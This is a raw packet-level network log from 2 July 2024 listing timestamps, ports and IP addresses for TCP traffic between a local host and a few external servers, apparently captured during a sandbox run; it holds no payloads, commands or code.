Jul 2, 2024 00:05:08.286678076 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286686897 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.286688089 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286699057 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286701918 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.286777973 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.286796093 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286806107 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286814928 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286825895 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286842108 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.286881924 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.286917925 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286928892 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286937952 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286947966 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286957026 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286967993 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286982059 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.286983967 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286993027 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.287003040 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.287014961 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.287015915 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.287015915 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.287024021 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.287034035 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.287045002 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.287045956 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.287055969 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.287070990 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.287077904 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.287077904 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.287103891 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.287117958 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.287156105 CEST	49732	443	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:08.288352013 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288362026 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288373947 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288391113 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288402081 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288407087 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288413048 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288414955 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288424015 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288466930 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288466930 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288563013 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288573980 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288584948 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288595915 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288605928 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288611889 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288616896 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288626909 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288638115 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288647890 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288660049 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288660049 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288692951 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288692951 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288778067 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288789034 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288799047 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288810015 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288820028 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288830042 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288830042 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288830042 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288841009 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288851023 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288866997 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288870096 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288881063 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288892984 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288903952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288907051 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288907051 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288914919 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288925886 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288937092 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288937092 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288949013 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288963079 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288968086 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288974047 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288990021 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.288995981 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.288995981 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.289026976 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.289078951 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.289136887 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.289149046 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.289159060 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.289170980 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.289181948 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.289206982 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.289242983 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.295665026 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.295728922 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.317873955 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.317888021 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.317898989 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.317960978 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.318070889 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318089962 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318104029 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318114042 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318125010 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318135977 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318145990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318152905 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.318152905 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.318156958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318167925 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318176985 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318182945 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.318182945 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.318186998 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318197012 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318217039 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318227053 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318238020 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318247080 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.318247080 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.318252087 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318269968 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.318284988 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.318284988 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.318309069 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.318326950 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.326229095 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.326241016 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.326251984 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.326306105 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.326318979 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.326318979 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.326364040 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.326370955 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.326376915 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.326386929 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.326396942 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.326416969 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.326450109 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.330938101 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.330988884 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.330990076 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331000090 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331031084 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331067085 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331109047 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331119061 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331127882 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331139088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331156015 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331171036 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331180096 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331186056 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331186056 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331191063 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331199884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331237078 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331260920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331271887 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331281900 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331314087 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331342936 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331530094 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331574917 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331578016 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331588030 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331629038 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331653118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331665039 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331675053 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331690073 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331705093 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331743002 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331743002 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331789017 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331799984 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331809044 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331820011 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331830025 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331839085 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331844091 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331855059 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.331887007 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331887007 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331912994 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.331979990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.332057953 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.332067013 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.332115889 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.332178116 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.332189083 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.332197905 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.332209110 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.332225084 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.332252026 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.332262993 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.332290888 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.332290888 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.332504988 CEST	443	49732	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:08.376460075 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.376471043 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.376490116 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.376530886 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.376532078 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.376574039 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.376574039 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.376689911 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.376743078 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.376775026 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.376775980 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.376799107 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.376835108 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.376914024 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.376971006 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.376997948 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377051115 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377068996 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377079010 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377116919 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377197027 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377207041 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377276897 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377357960 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377394915 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377401114 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377405882 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377434969 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377459049 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377532005 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377542973 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377553940 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377567053 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377583027 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377615929 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377672911 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377686024 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377731085 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377751112 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377789974 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377801895 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377815962 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377827883 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377851009 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377862930 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377865076 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377875090 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377886057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.377938986 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377938986 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.377959967 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.378037930 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.378318071 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.378328085 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.378338099 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.378390074 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.378390074 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.378423929 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.378436089 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.378446102 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.378457069 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.378479004 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.378504992 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.378508091 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.378516912 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.378526926 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.378537893 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.378555059 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.378591061 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.379038095 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379048109 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379059076 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379106045 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.379106045 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.379123926 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379134893 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379144907 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379154921 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379190922 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.379204988 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.379296064 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379307032 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379317045 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379327059 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379338026 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379348040 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379349947 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.379364967 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.379386902 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.379386902 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.379403114 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.379506111 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379518032 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379527092 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379560947 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.379563093 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379586935 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.379637957 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.379739046 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379750013 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379765034 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379780054 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379791021 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.379842043 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.379872084 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379882097 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379892111 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379901886 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379918098 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379929066 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379931927 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.379931927 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.379940033 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379949093 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379966021 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.379971027 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.379992962 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380008936 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380012035 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.380022049 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.380032063 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.380047083 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.380080938 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.380081892 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.380098104 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.380168915 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.380179882 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.380189896 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.380199909 CEST	80	49717	77.91.77.80	192.168.2.6
